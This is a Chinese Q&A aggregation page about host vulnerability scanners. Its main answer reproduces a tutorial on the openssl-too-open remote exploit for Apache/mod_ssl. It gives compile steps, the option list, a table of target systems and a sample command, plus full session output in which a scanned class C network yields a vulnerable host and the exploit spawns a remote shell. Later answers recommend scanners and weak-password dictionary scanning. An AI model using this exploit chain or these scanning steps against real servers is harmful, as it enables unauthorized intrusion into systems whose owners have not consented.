導航:首頁 > IDC知識 > 主機掃描器

主機掃描器

發布時間:2020-10-26 23:06:56

1、求可以掃描ip主機漏洞的軟體,附帶漏洞利用的更好,win7的

apache_openssl漏洞的利用及許可權的提升
apache_openssl漏洞的利用及許可權的提升

--nightcat
轉載請保持文章完整

第一部分:獲得shell.

在packetstorm玩了一段時間,遇到有openssl-too-open.tar.gz這個exploit.
現在看看軟體包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

這個描述說明這個exploit 是openssl v 0.9.6的key_arg的漏洞來達到溢出的目的。不過也要
注意apache/mod_ssl的版本信息。對於大多數的有這樣條件的都能溢出成功。取得一個id是
nobody shell,有些甚至是root的許可權。軟體包裡面有一個掃描器,exploit。

好象聽起來很誘人,down回來研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h

習慣性的要讀一下軟體包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.編譯的方法:
直接make就可以,之後就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法:
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功,就要看準系統類型 和apache版本號
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip .就應該可以啦!
****/

3.openssl-scanner的用法:
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0

/****掃描一個c類的ip
*****./openssl-scanner -C 192.168.0.0
****/

4.一個實現例子:

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$

整個README 文件已經說的很明白了:
現在是總結一下實現的過程:
1.通過openssl-scanner來掃描一個c段的ip,找到有漏洞的主機,
2.用nc的方法查找banner得到三個目標內容:apache的版本號,openssl的版本號,操作系統版本3.在通過openssl-too-open來進行溢出得到一個shell.

2、防火牆可以防止被掃描工具掃描主機嗎?

防火牆不能有效防止埠掃描。正常的漏掃軟體會多線程並發去掃描,這種掃描量比較大,防火牆容易區分,但如果惡意用戶把掃描間隔加大,如果每1秒只掃一個埠,那麼防火牆是不會阻攔的,你開了什麼埠對方想掃出來只是時間問題。

3、掃描器有什麼用?

掃描器是一個踩點專用的入侵檢測軟體。比如很多埠掃描器,網頁注入掃描器等。

4、伺服器主機漏洞掃描軟體

SSS掃描之王,是俄羅斯的一個安全漏洞掃描軟體,十分強大,具體的可以百度,免注冊的

5、怎樣利用掃描器原理發現遠程網路的主機和它的操作系統

這個算是高技術型的了,掃描器原理我也不知道,但是你要看其他電腦主機你可以用向網吧一樣的管理軟體或者學校里一樣管理軟體來解決。

6、鍵盤,主機,列印機,掃描機,WIN7,繪圖儀這些哪個是計算機硬體?

Windows7是軟體 系統軟體
鍵盤 主機箱 列印機 掃描儀 繪圖儀 這些是硬體

7、流光掃描器怎麼掃描主機的信息

現在弱口令不流行了,就算全伺服器IP段你用流光5.0自帶的字典掃到密碼的可能專性幾乎為0再者小榕開發屬的流光對國內的Ip掃描有限制,建議你使用x-scan掛幾個自己的字典文件掃描 如果還是想用流光可以去下載流光使用手冊參考

8、嗅探器 掃描器區別

嗅探器,顧名思義是嗅探,就是偷偷的獲取別人的數據包。
掃描器,就是掃描對方的機器,設備,系統進行一個檢測,等待回應。
從行為上來說,嗅探器是被動的獲取別人的數據包,而掃描器是主動的發出某些特定的數據包(如檢測對方埠是否開放,弱口令,溢出等),然後等待目標回應從而判斷對方是否開放相應的埠啊等信息。
從應用范圍說,嗅探器主要用於區域網環境,對網段的某些或者全部機器進行數據包的監聽,以獲取某些信息(如Mail,FTP密碼)等。而掃描器沒有環境的要求任何機器都可以下載使用。

與主機掃描器相關的知識